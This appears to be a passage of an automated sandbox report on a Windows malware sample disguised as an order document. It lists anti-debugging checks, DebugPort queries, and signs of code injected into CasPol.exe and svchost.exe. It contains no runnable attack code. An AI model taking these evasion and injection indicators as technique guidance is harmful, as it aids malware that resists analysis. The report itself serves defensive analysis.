          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E14FB mov eax, dword ptr fs:[00000030h]1_2_016E14FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6CF0 mov eax, dword ptr fs:[00000030h]1_2_016A6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6CF0 mov eax, dword ptr fs:[00000030h]1_2_016A6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6CF0 mov eax, dword ptr fs:[00000030h]1_2_016A6CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8CD6 mov eax, dword ptr fs:[00000030h]1_2_016F8CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163849B mov eax, dword ptr fs:[00000030h]1_2_0163849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4496 mov eax, dword ptr fs:[00000030h]1_2_016E4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163FF60 mov eax, dword ptr fs:[00000030h]1_2_0163FF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8F6A mov eax, dword ptr fs:[00000030h]1_2_016F8F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163EF40 mov eax, dword ptr fs:[00000030h]1_2_0163EF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01624F2E mov eax, dword ptr fs:[00000030h]1_2_01624F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01624F2E mov eax, dword ptr fs:[00000030h]1_2_01624F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165E730 mov eax, dword ptr fs:[00000030h]1_2_0165E730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B73D mov eax, dword ptr fs:[00000030h]1_2_0164B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164B73D mov eax, dword ptr fs:[00000030h]1_2_0164B73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F070D mov eax, dword ptr fs:[00000030h]1_2_016F070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F070D mov eax, dword ptr fs:[00000030h]1_2_016F070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A70E mov eax, dword ptr fs:[00000030h]1_2_0165A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A70E mov eax, dword ptr fs:[00000030h]1_2_0165A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164F716 mov eax, dword ptr fs:[00000030h]1_2_0164F716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BFF10 mov eax, dword ptr fs:[00000030h]1_2_016BFF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BFF10 mov eax, dword ptr fs:[00000030h]1_2_016BFF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016637F5 mov eax, dword ptr fs:[00000030h]1_2_016637F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01638794 mov eax, dword ptr fs:[00000030h]1_2_01638794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7794 mov eax, dword ptr fs:[00000030h]1_2_016A7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7794 mov eax, dword ptr fs:[00000030h]1_2_016A7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A7794 mov eax, dword ptr fs:[00000030h]1_2_016A7794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163766D mov eax, dword ptr fs:[00000030h]1_2_0163766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AE73 mov eax, dword ptr fs:[00000030h]1_2_0164AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AE73 mov eax, dword ptr fs:[00000030h]1_2_0164AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AE73 mov eax, dword ptr fs:[00000030h]1_2_0164AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AE73 mov eax, dword ptr fs:[00000030h]1_2_0164AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164AE73 mov eax, dword ptr fs:[00000030h]1_2_0164AE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01637E41 mov eax, dword ptr fs:[00000030h]1_2_01637E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAE44 mov eax, dword ptr fs:[00000030h]1_2_016EAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAE44 mov eax, dword ptr fs:[00000030h]1_2_016EAE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162E620 mov eax, dword ptr fs:[00000030h]1_2_0162E620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DFE3F mov eax, dword ptr fs:[00000030h]1_2_016DFE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162C600 mov eax, dword ptr fs:[00000030h]1_2_0162C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162C600 mov eax, dword ptr fs:[00000030h]1_2_0162C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162C600 mov eax, dword ptr fs:[00000030h]1_2_0162C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01658E00 mov eax, dword ptr fs:[00000030h]1_2_01658E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1608 mov eax, dword ptr fs:[00000030h]1_2_016E1608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A61C mov eax, dword ptr fs:[00000030h]1_2_0165A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A61C mov eax, dword ptr fs:[00000030h]1_2_0165A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016376E2 mov eax, dword ptr fs:[00000030h]1_2_016376E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016516E0 mov ecx, dword ptr fs:[00000030h]1_2_016516E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01668EC7 mov eax, dword ptr fs:[00000030h]1_2_01668EC7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016536CC mov eax, dword ptr fs:[00000030h]1_2_016536CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DFEC0 mov eax, dword ptr fs:[00000030h]1_2_016DFEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8ED6 mov eax, dword ptr fs:[00000030h]1_2_016F8ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F0EA5 mov eax, dword ptr fs:[00000030h]1_2_016F0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F0EA5 mov eax, dword ptr fs:[00000030h]1_2_016F0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F0EA5 mov eax, dword ptr fs:[00000030h]1_2_016F0EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A46A7 mov eax, dword ptr fs:[00000030h]1_2_016A46A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BFE87 mov eax, dword ptr fs:[00000030h]1_2_016BFE87
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A309 mov eax, dword ptr fs:[00000030h]11_2_0324A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E131B mov eax, dword ptr fs:[00000030h]11_2_032E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322DB60 mov ecx, dword ptr fs:[00000030h]11_2_0322DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03253B7A mov eax, dword ptr fs:[00000030h]11_2_03253B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03253B7A mov eax, dword ptr fs:[00000030h]11_2_03253B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322DB40 mov eax, dword ptr fs:[00000030h]11_2_0322DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F8B58 mov eax, dword ptr fs:[00000030h]11_2_032F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322F358 mov eax, dword ptr fs:[00000030h]11_2_0322F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03254BAD mov eax, dword ptr fs:[00000030h]11_2_03254BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03254BAD mov eax, dword ptr fs:[00000030h]11_2_03254BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03254BAD mov eax, dword ptr fs:[00000030h]11_2_03254BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F5BA5 mov eax, dword ptr fs:[00000030h]11_2_032F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E138A mov eax, dword ptr fs:[00000030h]11_2_032E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03231B8F mov eax, dword ptr fs:[00000030h]11_2_03231B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03231B8F mov eax, dword ptr fs:[00000030h]11_2_03231B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032DD380 mov ecx, dword ptr fs:[00000030h]11_2_032DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03252397 mov eax, dword ptr fs:[00000030h]11_2_03252397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325B390 mov eax, dword ptr fs:[00000030h]11_2_0325B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032503E2 mov eax, dword ptr fs:[00000030h]11_2_032503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324DBE9 mov eax, dword ptr fs:[00000030h]11_2_0324DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032D23E3 mov ecx, dword ptr fs:[00000030h]11_2_032D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032D23E3 mov ecx, dword ptr fs:[00000030h]11_2_032D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032D23E3 mov eax, dword ptr fs:[00000030h]11_2_032D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032A53CA mov eax, dword ptr fs:[00000030h]11_2_032A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032A53CA mov eax, dword ptr fs:[00000030h]11_2_032A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03264A2C mov eax, dword ptr fs:[00000030h]11_2_03264A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03264A2C mov eax, dword ptr fs:[00000030h]11_2_03264A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324A229 mov eax, dword ptr fs:[00000030h]11_2_0324A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03238A0A mov eax, dword ptr fs:[00000030h]11_2_03238A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03225210 mov eax, dword ptr fs:[00000030h]11_2_03225210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03225210 mov ecx, dword ptr fs:[00000030h]11_2_03225210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03225210 mov eax, dword ptr fs:[00000030h]11_2_03225210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03225210 mov eax, dword ptr fs:[00000030h]11_2_03225210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322AA16 mov eax, dword ptr fs:[00000030h]11_2_0322AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322AA16 mov eax, dword ptr fs:[00000030h]11_2_0322AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03243A1C mov eax, dword ptr fs:[00000030h]11_2_03243A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032EAA16 mov eax, dword ptr fs:[00000030h]11_2_032EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032EAA16 mov eax, dword ptr fs:[00000030h]11_2_032EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032DB260 mov eax, dword ptr fs:[00000030h]11_2_032DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032DB260 mov eax, dword ptr fs:[00000030h]11_2_032DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032F8A62 mov eax, dword ptr fs:[00000030h]11_2_032F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0326927A mov eax, dword ptr fs:[00000030h]11_2_0326927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229240 mov eax, dword ptr fs:[00000030h]11_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229240 mov eax, dword ptr fs:[00000030h]11_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229240 mov eax, dword ptr fs:[00000030h]11_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229240 mov eax, dword ptr fs:[00000030h]11_2_03229240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032EEA55 mov eax, dword ptr fs:[00000030h]11_2_032EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032B4257 mov eax, dword ptr fs:[00000030h]11_2_032B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032252A5 mov eax, dword ptr fs:[00000030h]11_2_032252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032252A5 mov eax, dword ptr fs:[00000030h]11_2_032252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032252A5 mov eax, dword ptr fs:[00000030h]11_2_032252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032252A5 mov eax, dword ptr fs:[00000030h]11_2_032252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032252A5 mov eax, dword ptr fs:[00000030h]11_2_032252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0323AAB0 mov eax, dword ptr fs:[00000030h]11_2_0323AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0323AAB0 mov eax, dword ptr fs:[00000030h]11_2_0323AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325FAB0 mov eax, dword ptr fs:[00000030h]11_2_0325FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325D294 mov eax, dword ptr fs:[00000030h]11_2_0325D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325D294 mov eax, dword ptr fs:[00000030h]11_2_0325D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03252AE4 mov eax, dword ptr fs:[00000030h]11_2_03252AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E4AEF mov eax, dword ptr fs:[00000030h]11_2_032E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03252ACB mov eax, dword ptr fs:[00000030h]11_2_03252ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov eax, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03244120 mov ecx, dword ptr fs:[00000030h]11_2_03244120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325513A mov eax, dword ptr fs:[00000030h]11_2_0325513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0325513A mov eax, dword ptr fs:[00000030h]11_2_0325513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_03229100 mov eax, dword ptr fs:[00000030h]11_2_03229100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322C962 mov eax, dword ptr fs:[00000030h]11_2_0322C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322B171 mov eax, dword ptr fs:[00000030h]11_2_0322B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0322B171 mov eax, dword ptr fs:[00000030h]11_2_0322B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324B944 mov eax, dword ptr fs:[00000030h]11_2_0324B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_0324B944 mov eax, dword ptr fs:[00000030h]11_2_0324B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032561A0 mov eax, dword ptr fs:[00000030h]11_2_032561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032561A0 mov eax, dword ptr fs:[00000030h]11_2_032561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_032E49A4 mov eax, dword ptr fs:[00000030h]11_2_032E49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040CED3 LdrLoadDll,1_2_0040CED3
          Source: C:\Users\user\Desktop\Requisito ordine n. 230210.exeMemory allocated: page read and write | page guardJump to behavior

